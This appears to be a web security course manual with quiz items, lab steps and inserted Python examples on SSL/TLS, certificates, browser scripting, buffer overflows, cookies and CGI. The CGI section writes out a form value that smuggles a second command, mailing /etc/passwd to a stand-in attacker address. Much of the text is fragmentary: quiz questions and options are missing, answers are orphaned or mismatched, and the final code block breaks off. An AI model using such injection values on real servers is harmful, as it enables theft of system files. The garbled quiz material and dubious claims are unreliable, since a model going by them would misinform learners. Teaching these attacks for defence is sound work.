A Message Digest v 5
B Message Digital 5
C Message Digitalization 5
D Mixed Digest Standard 5
10 How many digital signatures does X.509 support to attest to the key's validity?
A 0
B
C Multiple
11 Public key encryption allows the symmetrical key to be distributed encrypted along with the __________ text.
cipher
13 X.509 is the standard for digital signatures. True or false?
False: It is a standard for digital certificates.
14 Conventional encryption is normally slower than public key encryption. True or false?
False: It is actually about 1000 times faster.
15 When encrypting e-mail, ____________ encryption provides the ability to compress the message before encryption takes place.
PGP
16 The ______________ encryption algorithm is considered the industry standard encryption algorithm today.
3DES
protocols.
B Discuss the vulnerabilities associated with JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, SMTP relay, and how they are commonly exploited.
C Configure Internet Explorer security.
Transport protocols
Explanation The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly used protocols for managing the security of a message transmitted across the Internet. Developed by Netscape, SSL is also supported by Microsoft and other Internet client/server developers. SSL is included as part of both the Microsoft and Netscape browsers and most Web server products. It has become the de facto standard. TLS is essentially the latest version of SSL, but it is not as widely available in browsers. The SSL/TLS protocol runs between the Transport and Application layers, as shown in Exhibit 6-1. SSL/TLS uses TCP/IP on behalf of the higher-level protocols and allows an SSL-enabled server to authenticate itself to an SSL-enabled client, the client to authenticate itself to the server, and both machines to establish an encrypted connection.
Exhibit 6-1: SSL/TLS in the TCP/IP protocol suite (figure; layers shown from top to bottom)
  SSL/TLS
  Transport Layer: TCP, UDP
  Internet Layer: ICMP
  Network Interface: Ethernet, PPP, Frame Relay, ATM

Review the TCP/IP networking model before explaining that SSL/TLS runs on top of TCP. SSL/TLS records are carried inside TCP segments. Explain that SSL/TLS would be a sub-layer between the Transport layer and the Application layer protocols.
Web security
Security mechanisms
SSL/TLS uses ciphers, which enable the encryption of data between two parties, and digital certificates, which provide the authentication of the end points for end-to-end secure communication.
Ciphers
There are two encryption (cipher) types used by SSL/TLS: symmetric encryption (secret key encryption) and asymmetric encryption (public key encryption). Used alone, each has its shortcomings. Symmetric encryption can be secure only if the shared secret key is securely exchanged, which raises the problem of how to exchange a secret key across the Internet, given that the insecure nature of the Internet is the reason for using encryption in the first place. Asymmetric encryption solves the problem of securely sharing keys over the Internet, but it requires longer processing times because of the complexity of the algorithm.

SSL and TLS work around these limitations by using both types of ciphers: first an asymmetric cipher to securely exchange the shared secret key, and then the secret key to transfer the data. One of the parties picks a random secret key and encrypts it with the other end point device's public key. The encrypted key is then sent to the other party, where it is decrypted using the private key known only to that party. No one else can decrypt the secret key because no one else has the private key. After each end point has the secret key, the parties use this shared key for symmetric (secret key) encryption, which can be performed quickly.

Along with the type of cipher being used, the cipher size or strength also plays a role in secure transactions. Web browsers limited to 40- and 56-bit keys are still commonly found and are considered to have weak encryption, because keys of these sizes can be cracked in a short time period (approximately one week) using commonly available processing power. These weakly encrypted browsers are common because of the U.S. regulations on exportation of strong encryption. It's expected that these weak browsers will become less common with the recent changes in regulations made by the U.S. government. Ciphers using 128-bit keys provide a much higher level of protection. Some SSL/TLS-enabled Web servers require the browser to support 128-bit ciphers to establish a connection.

Do it!
A-1:
Here's how
1 Log on as Administrator
2 Open Internet Explorer
3 Choose Help, About Internet Explorer (To determine what key size is currently enabled on your browser. The heading called Cipher Strength specifies the key size. If you don't have 128-bit encryption, you can click the Update Information link to the right of the Cipher Strength heading to download the 128-bit encryption software.)
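The hybrid key exchange described under Ciphers above, as an added Python example that is not part of the course manual: the client wraps a random 128-bit secret key with the server's public key and encrypts the data with that secret key; the server unwraps the key with its private key and decrypts. The RSA key pair is textbook RSA over two Mersenne primes with no padding, and the bulk cipher is an HMAC-SHA256 counter-mode keystream, both constructed here so the example runs offline and stands in for the real algorithms SSL/TLS negotiates.

```python
"""Toy model of the SSL/TLS hybrid scheme: public key wraps a session key, session key encrypts data."""
import hashlib
import hmac
import secrets

# Server key pair. Mersenne primes avoid prime generation in the example; real RSA uses
# random primes of 1024 bits or more and a padding scheme such as OAEP.
P = 2**127 - 1
Q = 2**107 - 1
N = P * Q                                   # modulus, about 234 bits: a 128-bit key fits
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))           # private exponent (requires Python 3.8+)
SERVER_PUBLIC_KEY = (E, N)
SERVER_PRIVATE_KEY = (D, N)
KEY_BYTES = 16                              # 128-bit session key, the "strong" size in the text


def rsa_encrypt(m: int, public_key) -> int:
    e, n = public_key
    if not 0 <= m < n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, e, n)


def rsa_decrypt(c: int, private_key) -> int:
    d, n = private_key
    return pow(c, d, n)


def keystream(key: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256; a toy stand-in for the negotiated bulk cipher."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def sym_crypt(key: bytes, data: bytes) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def client_send(server_public_key, plaintext: bytes):
    """Client side: pick a random secret key, wrap it with the server's public key,
    then encrypt the data with the secret key. Returns (wrapped_key, ciphertext)."""
    session_key = secrets.token_bytes(KEY_BYTES)
    wrapped = rsa_encrypt(int.from_bytes(session_key, "big"), server_public_key)
    return wrapped, sym_crypt(session_key, plaintext)


def server_receive(server_private_key, wrapped: int, ciphertext: bytes) -> bytes:
    """Server side: unwrap the secret key with the private key, then decrypt the data."""
    session_key = rsa_decrypt(wrapped, server_private_key).to_bytes(KEY_BYTES, "big")
    return sym_crypt(session_key, ciphertext)


def round_trip(plaintext: bytes) -> bool:
    wrapped, ciphertext = client_send(SERVER_PUBLIC_KEY, plaintext)
    return server_receive(SERVER_PRIVATE_KEY, wrapped, ciphertext) == plaintext


if __name__ == "__main__":
    form = b"userid=Jonathan&password=Public"   # constructed sample login data
    wrapped, ct = client_send(SERVER_PUBLIC_KEY, form)
    print("wrapped key bits:", wrapped.bit_length(), "ciphertext:", ct.hex())
    print("server recovered:", server_receive(SERVER_PRIVATE_KEY, wrapped, ct))
```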
Digital certificates
Explanation Digital certificates enable authentication of the parties involved in a secure transaction. A typical certificate has the following components:
- The certificate issuer's name
- The entity for which the certificate is being issued (also called the subject)
- The public key of the subject
- Time stamp

Certificates are typically issued by certificate authorities (CAs) that act as a trusted third party. Certificates can be considered a standard way of binding a public key to a name, verifying the identity of the parties involved. Certificates prevent users from impersonating other parties. There are two distinct types of certificate authorities that issue digital certificates:
- Public certificate authorities, such as VeriSign, are recognized as trusted by most Web browsers and servers. A certificate issued by a public CA is usually used when no other relation exists between two parties.
- Private certificate authorities are established in-house by enterprises that need to create their own closed, private certificate infrastructure.
A-2:
Here's how
Explain to students that Ethereal is used to examine data from a live network via an Ethernet interface, and that there are four main tasks to perform in this activity.
Accept all defaults and the user agreement
After the installation is complete, restart the computer
5 Log in as Administrator
6 Open C:\Security
  Double-click the Ethereal-setup-0.10.12 file (To install Ethereal.)
  Accept the license agreement and all defaults
7 Check Run Ethereal 0.10.12 and click Finish (To launch Ethereal.)
Do it!
A-3:
Here's how
1 Launch a Web browser
  Go to http://www.netbank.com
2 Return to the open Ethereal program
3 Choose Capture, Options
4 Click the pull-down Interface menu
  Choose the interface that's connected to your Ethernet network
5 Clear Capture packets in Promiscuous mode
  Click Start
7 Return to the browser
  Refresh the page that's already loaded
Do it!
A-4:
Here's how
1 Review the records in the top pane (This shows information about the protocols used to refresh this page.)
2 Click the first record with HTTP as the Protocol and GET as the first word of the Info field
  Review the information in the middle pane
3 Click any entry in the middle pane (You will see the equivalent data highlighted in the bottom pane. This is the actual data, coded in hexadecimal and ASCII format.)
4 Expand Internet Protocol
  Locate the source and destination addresses (In the middle pane. Record the entries below:
  Source: ___________________________
  Destination: _______________________)
5 Expand Transmission Control Protocol
  Locate the source and destination ports and the next sequence number (Record the entries below:
  Source: _______________________________
  Destination: ___________________________
  Next sequence number: __________________)
6 Expand the Hypertext Transfer Protocol entry
  Locate the Host entry and click it (The hostname is selected in the bottom pane as well. This should be readable as ASCII text. Make sure you select the Hypertext Transfer Protocol in the middle pane first.)
7 Return to the top pane and review the information for several of the other HTTP packets with a destination of your local computer (All HTTP data should be readable in the bottom pane.)
Do it!
A-5:
Here's how
1 In the Netbank browser window, click Account Login
3 Enter your first and last names as the User ID and Password, respectively, but don't click Login
4 Return to Ethereal and choose Capture, Start
5 In the browser, click Login
  When the page finishes loading with an error, stop the Ethereal capture (If you're prompted by AutoComplete, specify that it should not offer to remember passwords, and click No.)
6 In the Ethereal Network Analyzer window, review the first three TCP packets by clicking them in the top pane (This is the three-way handshake between your host and the server to establish the connection.)
7 Find the following entries in the top pane and review the Secure Socket Layer content of these frames in the middle pane:
  SSL Client Hello
  Server Hello
  Change Cipher Spec
  Application Data
  (The first three entries describe the negotiation for and exchange of ciphers. The Application Data entry contains the transmission of the HTML data. Notice that you can no longer read the HTML in the bottom pane due to the SSL encryption.)
8 Close Ethereal
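What Ethereal shows in activities A-4 and A-5, as an added Python example that is not part of the course manual: a minimal parser for the SSL/TLS record layer run over a constructed capture (Client Hello, Server Hello, Change Cipher Spec, Application Data), beside a constructed plaintext HTTP request, with a check of whether each payload is readable ASCII the way the bottom pane displays it. The frames, hostname and cipher suite list are constructed for the example; the record format and suite identifiers are the standard ones.

```python
"""Minimal SSL/TLS record-layer parser over a constructed capture, beside a plaintext HTTP request."""
import struct

RECORD_TYPES = {20: "Change Cipher Spec", 21: "Alert", 22: "Handshake", 23: "Application Data"}
HANDSHAKE_TYPES = {1: "Client Hello", 2: "Server Hello", 11: "Certificate",
                   14: "Server Hello Done", 16: "Client Key Exchange", 20: "Finished"}
# Cipher suite identifiers from the TLS registry; 0x0003 is a 40-bit export suite.
CIPHER_SUITE_NAMES = {0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
                      0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
                      0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
                      0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5"}


def is_readable_ascii(payload: bytes) -> bool:
    """True when every byte is printable ASCII (what the bottom pane can show as text)."""
    return bool(payload) and all(32 <= b < 127 or b in (9, 10, 13) for b in payload)


def http_host(request: bytes):
    """Return the Host header of a plaintext HTTP request, as located in step 6 of A-4."""
    for line in request.split(b"\r\n")[1:]:
        if line.lower().startswith(b"host:"):
            return line.split(b":", 1)[1].strip().decode("ascii")
    return None


def _skip_hello_prefix(body: bytes) -> int:
    # Both Hello messages start with version(2) + random(32) + session_id<0..32>.
    pos = 2 + 32
    return pos + 1 + body[pos]


def client_hello_suites(body: bytes):
    pos = _skip_hello_prefix(body)
    count = int.from_bytes(body[pos:pos + 2], "big")       # byte length of the suite list
    pos += 2
    return [int.from_bytes(body[i:i + 2], "big") for i in range(pos, pos + count, 2)]


def server_hello_suite(body: bytes) -> int:
    pos = _skip_hello_prefix(body)
    return int.from_bytes(body[pos:pos + 2], "big")


def parse_records(data: bytes):
    """Walk the record layer: each record is type(1) version(2) length(2) body."""
    records, offset = [], 0
    while offset + 5 <= len(data):
        ctype, major, minor, length = struct.unpack("!BBBH", data[offset:offset + 5])
        body = data[offset + 5:offset + 5 + length]
        if len(body) < length:
            raise ValueError("truncated record at offset %d" % offset)
        info = {"type": RECORD_TYPES.get(ctype, "unknown (%d)" % ctype),
                "version": "%d.%d" % (major, minor), "length": length,
                "readable": is_readable_ascii(body)}
        if ctype == 22 and len(body) >= 4:
            htype, hlen = body[0], int.from_bytes(body[1:4], "big")
            hbody = body[4:4 + hlen]
            info["handshake"] = HANDSHAKE_TYPES.get(htype, "unknown (%d)" % htype)
            if htype == 1:
                info["cipher_suites"] = client_hello_suites(hbody)
            elif htype == 2:
                info["cipher_suite"] = CIPHER_SUITE_NAMES.get(server_hello_suite(hbody))
        records.append(info)
        offset += 5 + length
    return records


# --- Constructed sample traffic (not a real capture) ---------------------------
def tls_record(ctype: int, body: bytes, version=(3, 1)) -> bytes:
    return bytes([ctype, *version]) + len(body).to_bytes(2, "big") + body


def handshake(htype: int, body: bytes) -> bytes:
    return bytes([htype]) + len(body).to_bytes(3, "big") + body


def build_client_hello(suites) -> bytes:
    body = bytes([3, 1]) + bytes(32) + bytes([0])            # version, zero random, no session id
    body += (2 * len(suites)).to_bytes(2, "big") + b"".join(s.to_bytes(2, "big") for s in suites)
    body += bytes([1, 0])                                     # one compression method: null
    return tls_record(22, handshake(1, body))


def build_server_hello(suite: int) -> bytes:
    body = bytes([3, 1]) + bytes(32) + bytes([0]) + suite.to_bytes(2, "big") + bytes([0])
    return tls_record(22, handshake(2, body))


PLAINTEXT_HTTP = b"GET / HTTP/1.1\r\nHost: www.netbank.com\r\nUser-Agent: Mozilla/4.0\r\n\r\n"
SAMPLE_CAPTURE = (build_client_hello([0x0035, 0x002F, 0x000A, 0x0003])
                  + build_server_hello(0x002F)
                  + tls_record(20, b"\x01")
                  + tls_record(23, bytes.fromhex("9f1c0aa8e3d4027bffe1c3")))  # opaque ciphertext

if __name__ == "__main__":
    print("HTTP readable:", is_readable_ascii(PLAINTEXT_HTTP), "Host:", http_host(PLAINTEXT_HTTP))
    for rec in parse_records(SAMPLE_CAPTURE):
        print(rec)
```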
Do it!
A-6:
- At the Network layer
- At the Physical layer
- Between the Data Link layer and the Network layer
- Between the Transport layer and the Application layer
2 What are the two encryption types used by SSL and TLS?
Asymmetric (public key) and symmetric (secret key)
- Certificate issuer's name
- Entity for whom the certificate is being issued
- Public key of the certificate authority
- Time stamp
5 Public certificate authorities are used when no other relation exists between two parties. True or false?
True
As an exercise, have students draw a flowchart of sorts that describes the process and the decisions that occur during the process; this should help them understand how the public and secret keys are used.
Viewing certificates
Explanation You can view certificates by double-clicking the padlock icon in the browser's status bar. The General tab provides general information about the certificate, such as to whom the certificate was issued, who issued it, and when it's valid. The Details tab provides you with more detailed information, including:
- Version: The version of X.509 used to create the certificate.
- Serial Number: The unique serial number for the certificate.
- Signature Algorithm: The encryption algorithm used to create the certificate's signature.
- Issuer: The issuer of the certificate.
- Valid From: The date from which the certificate is valid.
- Valid To: The date after which the certificate expires.
- Subject: Used to establish the certificate holder, which typically includes the identification and geographic information.
- Public Key: The certificate's encrypted public key.
- Thumbprint Algorithm: The encryption algorithm used to create the certificate's thumbprint.
- Thumbprint: The encrypted thumbprint of the signature (for example, message digest).
- Friendly Name: The descriptive name assigned to the certificate.

Do it!
A-7:
Here's how
1 In your browser, return to the Netbank login page (If necessary.)
2 Double-click the SSL icon
(To view the certificate of the CA.)
(To close the certificate information.)
Do it!
A-8: Discussing HTTPS
5 The client generates a secret session key based on the _______________ sent by the server.
Priority list
6 The client encrypts a copy of the new session key it generated with the public key of the server obtained from the certificate. True or false?
True
JavaScript
JavaScript is a scripting language developed by Netscape to enable Web authors to design interactive sites. JavaScript code is typically embedded into an HTML document and placed somewhere between the <head> and </head> tags. The HTML tags that indicate the beginning and ending of JavaScript code are <script> and </script>. It's possible to have multiple blocks of code within an HTML page, as long as they are surrounded by the aforementioned tags. One could also make a reference to an external JavaScript file instead of inserting the actual code within the body of the HTML code. A typical example of JavaScript code within an HTML document is as follows:

<html>
<head>
<title>Example JavaScript</title>
<script language="JavaScript">
document.writeln("Example");
</script>
</head>
<body>
. .
</body>
</html>
Many Web browsers support the ability to download JavaScript programs with an HTML page and execute them within the browser. Such programs are often used to interact with the client or browser user and transmit information back to the Web server that provided the page. These programs can also perform tasks outside of the user's control, such as changing a default Web page or sending an e-mail out to a distribution list.

Vulnerabilities
JavaScript programs are executed based on the intended functionality and security context of the Web page with which they were downloaded. Such programs have restricted access to other resources within the browser. Security loopholes exist in certain Web browsers that permit JavaScript programs to monitor a client's (browser's) activities beyond their intended purpose. The execution of such programs and the passing of information between the server and browser or client usually takes place without the knowledge of the client. Malicious JavaScript programs can even make their way through firewalls, which lack the configuration parameters to prevent such activities. Some of the documented security holes associated with JavaScript on various browsers are:
- Monitoring Web browsing: The CERT Coordination Center unveiled JavaScript vulnerabilities that allow an attacker to monitor the browsing activities of a user even when the user is visiting a secure (HTTPS) Web page and is behind a firewall. This information includes the URLs of browsed pages and cookies downloaded to client machines by the visited Web servers.
- Reading password and other system files: The JavaScript implementation in Netscape versions 4.04 through 4.74 allows JavaScript embedded in HTML code to read sensitive files (including system password files) and transmit them back to the owner of the page. A similar vulnerability is inherent in Microsoft Internet Explorer 4.0 through 4.01.
- Reading browser preferences: Certain versions of Netscape allow embedded JavaScript to access the preferences file, which contains information such as e-mail servers, mailbox files, e-mail addresses, and even e-mail passwords.

Safeguards
Many browsers provide additional patches to fix JavaScript-related vulnerabilities. These patches are typically downloadable from the vendors' Web sites (such as those of Microsoft and Netscape). Unless a patch is available from the browser vendor, users should disable JavaScript to avoid being victimized by such programs.
ActiveX
ActiveX is a loosely defined set of technologies developed by Microsoft that provides tools for linking desktop applications to WWW content. It enables self-contained software components to interact with a wide variety of applications. Certain components of ActiveX can be triggered by HTML scripts to provide rich Web content to clients. For instance, ActiveX technology allows users to view Word and Excel documents directly from a browser interface. MS Office applications (Microsoft Access, Excel, and PowerPoint) are examples of built-in ActiveX components.

Vulnerabilities
These applications utilize embedded Visual Basic code that can compromise the integrity, availability, and confidentiality of a target system. Microsoft Office specifications support the integration of certain kinds of macros, written in Visual Basic (VB), into MS Office documents. An attacker could potentially embed harmful macros into these documents that could compromise a target system or information stored on that system. After embedding malicious macros into such documents, an attacker can create an HTML interface or link that references the infected file. The HTML is then distributed by e-mail to the target systems. If the receiver of the infected files uses an HTML-enabled mail client, the embedded code in the referenced document is executed without the Web client's knowledge. Many mail clients provide an auto preview feature, so no action might be required on the part of the victim for this to occur. As a result of this vulnerability, an attacker could gain access to sensitive information (passwords or other private data stored on the system), edit the registry settings of the target system, or use the target system to launch attacks on other systems, as in the case of a distributed denial-of-service attack.

Safeguards
Microsoft has developed certain patches to address vulnerabilities exposed by ActiveX. Unless it is specifically needed, however, the best way to protect against such attacks is to disable ActiveX scripting altogether on the client.
Do it!
B-1:
2 Which of the following is true of JavaScript programs? (Choose all that apply.)
A They can be downloaded with an HTML page.
B They can perform tasks undetected by the user.
C They can pass through firewalls.
D They can monitor the browsing activities of a user.
3 ActiveX allows users to view MS Office documents directly from a browser interface. True or false?
True
4 An attacker could use ActiveX to embed harmful macros into MS Office documents. True or false?
True
- Switch on the auto preview feature in the e-mail program.
- Modify the ActiveX script.
- Use an antivirus scanner.
- Disable ActiveX scripting.
Web security
Buffer overflows
Explanation
The buffer overflow attack can be triggered by sending, within a given field, more data than the receiving application can hold. When executed with precision and deliberation, such attempts might cause the application to stop performing its intended functions and force it to execute commands on behalf of the attacker. If the application under attack has sufficient (root) administrative privileges, it is possible for the attacker to take control of the entire system through the controlled application.

There are two prerequisite objectives the attacker needs to accomplish to execute a successful buffer overflow attack:
- Place the necessary code into the program's address space. The attacker uses the victim's buffer to place the code that executes the intended attack. This is accomplished by sending instructions (bytes) to the CPU of the target system.
- Direct the application to read and execute the embedded code through effective manipulation of the registers and memory of the system. Most of the time, the code the attacker is looking to exploit already exists on the target system. In these situations, all the attacker needs to do is modify the necessary parameters to point to the targeted section of the code.

These actions are intended to corrupt the receiving buffer and alter the program's control flow to trigger the desired action. In such attacks, the attacker can gain access to a prompt, examine system-specific variables, read system directories and files, and even discover the network architecture, which he or she can use to further exploit the system. This is especially dangerous when the application is configured to have root privileges on the system. In this case, the attacker can operate as the system administrator of the Web server and its environment. Effective buffer overflow attacks are not easy to coordinate. The attacker needs to be precise enough to launch the attack using the instruction pointers so that he or she can take over the administrative privileges without crashing the system.

Vulnerabilities
Buffer overflow attacks often take advantage of poor application programming that does not check the size of the input field. Abundant information about these vulnerabilities is published on the Internet for the edification of vendors and hackers alike.

Safeguards
Careful design of the application, based on the intended response, can effectively prevent such attacks. While implementing buffers, software developers could set the program to throw away the excess data, halt all operations, or provide the user with a warning message if a buffer overflow condition presents itself. A more proactive approach would be to design the application to automatically check the size of the data that enters the buffer. System administrators should maintain current updates and patches on all software. The CERT Coordination Center (www.cert.org/current/) provides advisories on all recently discovered application vulnerabilities. It also maintains an archive of previously found vulnerabilities at www.cert.org/advisories.
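As an added illustration that is not part of the course manual, the following Python model shows the two prerequisites above (input landing in the program's address space, then overwriting the saved instruction pointer) next to the size-check safeguard; the frame layout, field size and return address are constructed for the model.

```python
"""Constructed teaching model of a stack buffer overflow and its safeguard.

Added example, not code from the course manual. A 'frame' is a bytearray
holding a fixed-size input field followed by the saved instruction pointer
(return address): excess input spills into the pointer and so alters the
program's control flow, which is what the two prerequisites rely on.
"""

FIELD_SIZE = 16             # capacity of the receiving field (constructed)
PTR_SIZE = 4                # width of the saved instruction pointer (32-bit model)
LEGIT_RETURN = 0x08048A10   # constructed 'normal' return address


class Frame:
    """Memory layout: [field: FIELD_SIZE bytes][saved_ip: PTR_SIZE bytes]."""

    def __init__(self) -> None:
        self.memory = bytearray(FIELD_SIZE + PTR_SIZE)
        self.memory[FIELD_SIZE:] = LEGIT_RETURN.to_bytes(PTR_SIZE, "little")

    @property
    def saved_ip(self) -> int:
        """The address the function will jump to when it returns."""
        return int.from_bytes(self.memory[FIELD_SIZE:], "little")


def unchecked_copy(frame: Frame, data: bytes) -> None:
    """The flaw the text describes: copy every byte, never consult the field size.

    Bytes 17..20 of the input land on the saved instruction pointer; input
    longer than the whole frame runs off the end, which the model reports
    as IndexError (the crash the text says an imprecise attacker causes).
    """
    for offset, byte in enumerate(data):
        frame.memory[offset] = byte


def checked_copy(frame: Frame, data: bytes, truncate: bool = False) -> bool:
    """The safeguard: check the size before anything enters the field.

    truncate=False is the 'halt and warn' policy: oversized input is refused
    and the frame is left untouched. truncate=True is the 'throw away the
    excess' policy: only the first FIELD_SIZE bytes are kept. Either way the
    saved instruction pointer can never be reached.
    """
    if len(data) > FIELD_SIZE:
        if not truncate:
            return False
        data = data[:FIELD_SIZE]
    frame.memory[0:len(data)] = data
    return True


def demonstrate(data: bytes) -> dict:
    """Feed the same input to an unchecked and a checked frame; report outcomes."""
    unchecked, checked = Frame(), Frame()
    unchecked_copy(unchecked, data)
    accepted = checked_copy(checked, data)
    return {
        "unchecked_saved_ip": unchecked.saved_ip,
        "checked_accepted": accepted,
        "checked_saved_ip": checked.saved_ip,
    }


if __name__ == "__main__":
    print(demonstrate(b"resume.doc"))   # both pointers intact, input accepted
    print(demonstrate(b"A" * 20))       # unchecked pointer becomes 0x41414141
```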
Cookies
Cookies serve a variety of functions, from personalizing Web pages based on user preferences to keeping the state of a user's shopping cart on an online store. Most Web-based authentication models are engineered to utilize cookies for verification of a user's session. Cookies have been designed to enhance the browsing experience of a typical user. Cookies are stored on a user's hard drive and can be accessed by a user's Web browser. The files contain saved login information, your address, shopping cart status, and a host of other things that can make the Web browsing experience more convenient. In Windows 2000/Server 2003 and XP, these cookie files are stored in the Documents and Settings folder for each user of the computer (the user profile).

Vulnerabilities
Cookies contain tools that are easily exploited by hackers and some so-called legitimate services to provide information about users without consent. Hackers often target cookies as a means of gaining illegal access to user accounts. Cookies can also be utilized to track information, such as the browsing habits of users, which might then be sold to an advertisement company that targets the user with unwanted ads. It's crucial for Web site owners to design security measures to handle Web-based cookies in order to protect their user base and the sensitive data stored on their servers.

Pages that can use a server's cookies are limited to that particular server, or to a domain hosting the server. An attacker could obtain a victim's cookie for a given service by generating a script that executes within a page from that same domain or server. One can accomplish this by a process known as Error Handling Exception (EHE). An attacker can execute code on the server that generates an error message that is returned to the user. The attacker can then exploit the insecure error notification to launch an attack on the target server. This is possible by manipulating the error messages that are returned from 404 requests (404 File Error) or from elements that are echoed back to the screen unescaped.
If students are unfamiliar with HTML coding, explain that the <A> tag is the anchor element used in hyperlinks.
It's not possible for an attacker to obtain a given cookie directly from a victim's computer. The attacker must convince a user to follow a malicious hyperlink to the targeted server so the cookie can be obtained through the error handling process on the server. For example, the attacker could send an e-mail (containing a link to the server) to an HTML-enabled e-mail client. More specifically, a hacker can manufacture a hyperlink and hide the malicious script behind the desired text of the <A> tag. When the innocent user activates the link, the malicious script embedded in the link can trigger the server to send the cookie to the attacker. One of the limiting factors of this type of attack is that the user must be logged on to the service during the time the attack takes place. If, for instance, the innocent user is not logged on to his Hotmail account (an HTML-enabled service), the attacker cannot use this technique to launch the attack.
The following policies will help protect your organization against cookie exploits:
- Disable the use of cookies by reviewing your browser's preferences and options. You can also specify that you be prompted before a site puts a cookie on your hard disk, so you can choose to allow or disallow the cookie. Notice that disabling cookies will make some Web pages inoperable.
- Do not use cookies to store sensitive information. If you must store confidential information in cookies, use SSL/TLS to prevent the information from being exploited by a hacker.
Do it!
B-2:
Monitor a browsers activities. Send enough data to overfill the buffer of a given field within an application. Force an application to execute commands on behalf of the attacker. Embed malicious macros.
2 What are the prerequisites for executing a buffer overflow? (Choose all that apply.)
A The attacker must modify the necessary parameters to point to the embedded code.
B The attacker must log in as the system administrator of the Web server.
C The attacker must launch the attack while the user is logged onto the service.
D The attack must place the necessary code to execute the attack in the victim's buffer.
3 A hacker can exploit cookies to gain illegal access to user accounts and track the browsing habits of users. True or false?
True
4 Hackers can only gain access to a cookie if the user logs on to the targeted service at the same time the attack takes place. True or false?
True
Java applets
Explanation
Java applets are Internet applications (written in the Java programming language) that can operate on most client hardware and software platforms. Applets are typically stored on Web servers, from which they are downloaded onto clients when accessed for the first time. On subsequent accesses to the server, the applet is already cached on the client and, therefore, can be executed with no download delay.

Signed and unsigned applets
Distribution of software over networks poses potential security problems because the software must pass through many intermediate devices before it reaches the user's computer. Software, unless downloaded from a trusted party, poses significant risks for an individual user's computer and data. The user often has no reliable way of confirming the source of downloaded software code or whether it was changed in transit over the network. Signing applets is a technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source. The application generates a private/public key pair and obtains a certificate authenticating the signer. The application then signs the applet code. Users downloading the applet can check the signature to verify the source of the code. Signed applets can be given more privileges than ordinary applets.

An unsigned applet operates subject to a set of restrictions called the sandbox model. Sandbox restrictions prevent the applet from performing certain operations on local system resources (for example, deleting files or modifying system information such as registry settings and other control panel functions). Signed applets do not have such restrictions. Unsigned applets typically display warning messages, such as the one shown in Exhibit 6-2.

Exhibit 6-2: Unsigned applet warning message
The user of the system on which the applet will be running decides what kind of access privileges should be granted to the signer of the applet. Commonly used browsers, such as Netscape and Microsoft Internet Explorer, keep track of these privileges. Depending on the applet's privileges, such browsers can grant access to system resources without interrupting the user. If the applet is new and has not established a trust relationship with the client's system, the browser displays a security message asking for the client's consent, as shown in Exhibit 6-3.
Exhibit 6-3: Security message confirming consent
Digitally signing an applet is a confirmation from the owner of the applet about its legitimate purpose. The final decision about whether the applet should have access to system resources always rests with the client. If a signed applet damages a system, intentionally or unintentionally, the applet can be traced back to its source from its signature. Two reasons for using code signing features are:
- To release the application from the sandbox restrictions imposed on unsigned code
- To provide confirmation regarding the source of the application's code
The Java Development Kit (1.1 and later) Security Manager is aware of signatures and, working in conjunction with the Java key tool (which is used to sign code and specify who is trusted), grants special privileges to signed and trusted applet code.
CGI
The Common Gateway Interface (CGI) is a programming interface that allows Web servers to perform data manipulation and interact with users. For example, CGI scripts perform data input, and search and retrieval functions on databases. CGI was created to extend the HTTP protocol. There are typically two parts to a CGI script: an executable program on the server (the script itself), and an HTML page that feeds input to the executable. The executable can be in the form of Perl scripts, shell scripts, or compiled programs. CGI scripts can sometimes be used without user input to perform tasks such as incrementing page counters and displaying the date and time. The following steps and Exhibit 6-4 represent a typical form submission that takes place on the Internet:
1 The user/client retrieves a form (an HTML-formatted page) from a server via a browser.
2 The user fills out the form by inputting data into the required fields on his or her local machine.
3 After filling out the form, the user submits the data to the server. This typically takes place via a submit button on the form.
4 The submit action performed in the client's browser identifies the corresponding program residing on the server, sends all the inputted data, and issues an execute request to the server.
5 The server executes the requested program.

Exhibit 6-4: Working of a CGI script
A similar process takes place for all types of CGI execution. CGI is very efficient because all data manipulation takes place on the server, not the client. The client merely passes data to the server and receives HTML in return. This leaves the server with only the task of executing the request when issued.

Vulnerabilities
The interactive nature of CGI also leads to security loopholes that need to be addressed by system administrators and software developers. CGI accepts input from a page on a client system (typically an HTML page downloaded in the browser), but executes the request on the server. Allowing input from other systems to a program that runs on a local server exposes the system to potential security hazards. Because the HTML form has been transferred to the client, a malicious user can modify or add parameters to the HTML form, instructing the server to do tasks outside the intended purpose of the form.
For instance, a malicious user can modify the following instruction:
This instruction is supposed to generate an e-mail to a system administrator with the following line:
<INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example.com;mail malicioususer@attack.com /etc/passwd"> SystemAdmin<br>
This line then sends an e-mail containing the UNIX password file to the attacker. Using such techniques, an attacker can gain access to confidential files and system files or install malicious programs and viruses.

Safeguards
It is extremely important to take precautions when running scripts on the Web server. Here are some possible precautions to take:
- Deploy intrusion detection systems (IDS), access list filtering and screening.
- Design and code applications to check the size and content of the input received from the clients.
- Create different user groups with different permissions and restrict access to the hierarchical file system based on those groups.
- Validate the security of a prewritten script before deploying it in your production environment.
The biggest security risk of CGI scripts is not to the client where the Web browser resides, but to the server where the script resides. CGI scripts must be carefully scrutinized before they are allowed on a Web server.
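The second safeguard above, checking the size and content of the send_to field before it reaches a mail command, shown beside the unchecked pattern the text describes. This is an added example in Python, not code from the course manual; the allowed recipients, field limit and temporary file path are constructed.

```python
"""Added example (not from the course manual): validating a CGI form field
before it reaches a mail command. Recipient addresses and the temporary
file path are constructed placeholders."""

import re
from typing import List
from urllib.parse import parse_qs

# Constructed allow-list: the only mailboxes this form is meant to notify.
ALLOWED_RECIPIENTS = {"systemadmin@example.com", "helpdesk@example.com"}
MAX_FIELD_LENGTH = 254                     # the size check
# Characters that would let a value break out of a shell command line.
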